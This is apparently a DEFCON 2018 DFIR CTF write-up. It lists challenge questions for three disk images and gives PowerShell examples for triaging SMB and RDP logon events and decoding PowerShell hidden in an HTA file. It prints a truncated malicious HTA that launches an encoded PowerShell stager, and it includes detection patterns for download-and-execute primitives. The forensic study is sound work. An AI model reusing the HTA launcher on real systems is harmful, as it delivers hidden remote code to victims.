DEFCON DFIR CTF 2018 — Lessons Learned

Primer + Proof of Completion:

Low Effort MS Paint skillz. Yep I’m hightail

Introduction

Challenge Format

  1. HR Server (Image 1)
  2. File Server (Image 2)
  3. Desktop (Image 3)

Each image carries three tiers of questions (Basic 2 points, Advanced 4 points, Expert 8 points each):

  1. HR Server — Basic
  2. HR Server — Advanced
  3. HR Server — Expert
  4. File Server — Basic
  5. File Server — Advanced
  6. File Server — Expert
  7. Desktop — Basic
  8. Desktop — Advanced
  9. Desktop — Expert

HR Server (Image 1)

Basic

> HR Server — Acquisition Software (2 points)

> HR Server — Acquisition Software Version (2 points)

> HR Server — Entry Name (2 points)

> HR Server — Entry Number (2 points)

> HR Server — Attribute ID (2 points)

> HR Server — SMB (2 points)

  1. Event ID 551 (SMB Session Authentication Failure)
  2. Starts at 2018-08-09 02:10:38
  3. Ends at 2018-08-09 02:10:39
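Added example, not code from the original write-up: a PowerShell script that bounds a burst of SMB Session Authentication Failure events (Event ID 551) the way the answer above does, and reports the rate so a one-second burst can be told apart from a user mistyping a password. It assumes the Microsoft-Windows-SMBServer/Security channel was exported from the image and sits in the current directory as Microsoft-Windows-SMBServer%4Security.evtx (the path is an assumption; the %4 in the file name is how Windows spells the "/" in the channel name on disk).

```powershell
# Added example (not from the original write-up): bound a burst of SMB
# authentication failures (Event ID 551) in an exported SMBServer/Security log.
# Assumes the log was copied out of the image from
# \Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Security.evtx
param(
    [string]$LogPath = ".\Microsoft-Windows-SMBServer%4Security.evtx"
)

# @() forces an array even when exactly one record matches; SilentlyContinue
# keeps "no events found" from aborting the script so the count check below runs.
$events = @(Get-WinEvent -FilterHashtable @{ Path = $LogPath; Id = 551 } -ErrorAction SilentlyContinue |
    Sort-Object TimeCreated)

if ($events.Count -eq 0) {
    Write-Host "No Event ID 551 records in $LogPath"
    return
}

# TimeCreated is rendered in the analysis machine's local time zone; convert to
# UTC so the reported window does not depend on where the analyst sits.
$first = $events[0].TimeCreated.ToUniversalTime()
$last  = $events[-1].TimeCreated.ToUniversalTime()

[pscustomobject]@{
    Count           = $events.Count
    FirstUtc        = $first.ToString("yyyy-MM-dd HH:mm:ss")
    LastUtc         = $last.ToString("yyyy-MM-dd HH:mm:ss")
    DurationSeconds = [int]($last - $first).TotalSeconds
} | Format-List

# Failures per second: dozens of 551s inside a one- or two-second window point
# at a spraying or brute-force tool rather than at a human.
$events |
    Group-Object { $_.TimeCreated.ToUniversalTime().ToString("yyyy-MM-dd HH:mm:ss") } |
    Sort-Object Name |
    Select-Object Name, Count |
    Format-Table -AutoSize

# The rendered message carries the account and client that failed; distinct
# messages show whether one client tried many names or many clients tried one.
$events | Select-Object -ExpandProperty Message -Unique | Select-Object -First 5
```

Run it from the directory holding the exported log, or pass -LogPath. If the export was taken from a live system instead of an image, the same filter works against the channel name with -LogName 'Microsoft-Windows-SMBServer/Security' in place of Path.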

> HR Server — Saved (2 points)

> HR Server — Application Q1 (2 points)

> HR Server — Application Q2 (2 points)

> HR Server — Changes Q1 (2 points)

> HR Server — Changes Q2 (2 points)

$UsnJrnl:$J Results
$Logfile results

Advanced

> HR Server — Logon (4 points)

Bingo

> HR Server — Task Started (4 points)

> HR Server — HR System 1 (4 points)

> HR Server — Web App (4 points)

> HR Server — Changes Q3 (4 points)

Expert

> HR Server — Web Traffic Q1 (8 points)

> HR Server — Web Traffic Q2 (8 points)

File Server

Basic

> File Server — Basic 1 (2 points)

> File Server — Basic 2 (2 points)

ewfinfo
FTK

> File Server — Basic 3 (2 points)

> File Server — Basic 4 (2 points)

> File Server — Basic 5 (2 points)

> File Server — Basic 6 (2 points)

> File Server — Basic 7 (2 points)

> File Server — Basic 8 (2 points)

> File Server — Basic 9 (2 points)

> File Server — Basic 10 (2 points)

Advanced

> File Server — Advanced 1 (4 points)

> File Server — Advanced 2 (4 points)

> File Server — Advanced 3 (4 points)

# Event ID 21 in the TerminalServices-LocalSessionManager Operational log is
# "Remote Desktop Services: Session logon succeeded"; the message carries the
# user, session ID and source network address. Straight quotes are required here.
Get-WinEvent -FilterHashtable @{Path=".\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx"; ID=21} | Where-Object -Property Message -match 'mpowers' | fl | more

> File Server — Advanced 4 (4 points)

> File Server — Advanced 5 (4 points)

> File Server — Advanced 6 (4 points)

> File Server — Advanced 7 (4 points)

Jigsaw puzzle skillz ftw

> File Server — Advanced 8 (4 points)

SAM + SYSTEM?

> File Server — Advanced 9 (4 points)

> File Server — Advanced 10 (4 points)

Expert

> File Server — Expert 1 (8 points)

> File Server — Expert 2 (8 points)

> File Server — Expert 3 (8 points)

> File Server — Expert 4 (8 points)

Desktop

Basic

> Desktop — Basic 1 (2 points)

> Desktop — Basic 2 (2 points)

> Desktop — Basic 3 (2 points)

> Desktop — Basic 4 (2 points)

> Desktop — Basic 5 (2 points)

SAM + SYSTEM?

> Desktop — Basic 6 (2 points)

> Desktop — Basic 7 (2 points)

> Desktop — Basic 8 (2 points)

Advanced

> Desktop — Advanced 1 (4 points)

> Desktop — Advanced 2 (4 points)

> Desktop — Advanced 3 (4 points)

> Desktop — Advanced 4 (4 points)

> Desktop — Advanced 5 (4 points)

> Desktop — Advanced 6 (4 points)

> Desktop — Advanced 7 (4 points)

> Desktop — Advanced 8 (4 points)

> Desktop — Advanced 9 (4 points)

Expert

> Desktop — Malicious Code Hosting (8 points)

$ cat out.hta
<html><head><script>var c= 'powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAFIAcwBJAE8AbgBUAGEAQgBsAEUALgBQAFMAVgBFAFIAcw
...JABEAGEAdABhAC4AbABlAG4AZwBUAEgAXQA7AC0AagBPAEkATgBbAEMASABhAHIAWwBdAF0AKAAmACAAJABSACAAJABkAEEAdABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA='
new ActiveXObject('WScript.Shell').Run(c);</script></head><body><script>self.close();</script></body></html>
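The -enc argument above is PowerShell's -EncodedCommand: base64 over the UTF-16LE ("Unicode") bytes of the script, which is why a plain base64 decode shows a NUL byte after every character. The page only shows the head and tail of the blob, so the full command cannot be recovered from it; the visible head decodes to `If($PSVERsIOnTaBlE.PSVERs` and the visible tail to `$Data.lengTH];-jOIN[CHar[]](& $R $dAtA ($IV+$K))|IEX`, i.e. a stager that decrypts a downloaded buffer and hands it to Invoke-Expression. The following is an added example, not code from the original write-up or from the challenge: two helper functions that pull the -enc argument out of an HTA and decode it, run over a constructed HTA sample built in the script (the sample text, the function names and the indicator list are all assumptions).

```powershell
# Added example (not from the original write-up): recover the PowerShell command
# hidden inside an HTA's `powershell -enc <base64>` launcher. -EncodedCommand is
# base64 over UTF-16LE text, so the bytes must be decoded as Unicode, not ASCII.
function Get-EncodedCommandFromHta {
    param([Parameter(Mandatory)][string]$HtaText)

    # -e / -enc / -EncodedCommand followed by the base64 blob, quotes optional.
    $m = [regex]::Match($HtaText, '-(?:e|enc|EncodedCommand)\s+["'']?([A-Za-z0-9+/=]+)', 'IgnoreCase')
    if (-not $m.Success) { throw "no -EncodedCommand argument found in HTA text" }
    return $m.Groups[1].Value
}

function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$Base64)
    $bytes = [Convert]::FromBase64String($Base64)
    # .NET "Unicode" is UTF-16LE, the encoding powershell.exe expects for -enc.
    return [System.Text.Encoding]::Unicode.GetString($bytes)
}

# Constructed sample (assumption): a harmless command encoded the way a launcher
# encodes it, wrapped in an HTA skeleton shaped like the one on the page.
$inner  = 'Write-Host "sample"; $u = "http://example.invalid/stage"'
$b64    = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($inner))
$sample = "<html><head><script>var c= 'powershell -noP -sta -w 1 -enc $b64'`nnew ActiveXObject('WScript.Shell').Run(c);</script></head><body><script>self.close();</script></body></html>"

$recovered = ConvertFrom-EncodedCommand (Get-EncodedCommandFromHta $sample)
$recovered

# Display only: never pipe a decoded stager into Invoke-Expression on the
# analysis box. Grep the decoded text for the download-and-execute primitives
# and any hard-coded host to answer "where was the code hosted".
$recovered | Select-String -Pattern 'IEX|Invoke-Expression|DownloadString|WebClient|https?://[^"''\s]+' -AllMatches
```

To use it on real evidence, read the HTA with Get-Content -Raw and pass the text to Get-EncodedCommandFromHta; if the decoded script is itself another layer (a second -enc, or a compressed Base64 string fed to IO.Compression), repeat the decode on that layer rather than executing it.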

> Desktop — Expert 2 (8 points)

> Desktop — Expert 3 (8 points)

  • malware
  • backdoor
  • dropper
  • hta
  • etc.

Final Thoughts

Internet noob.

Mon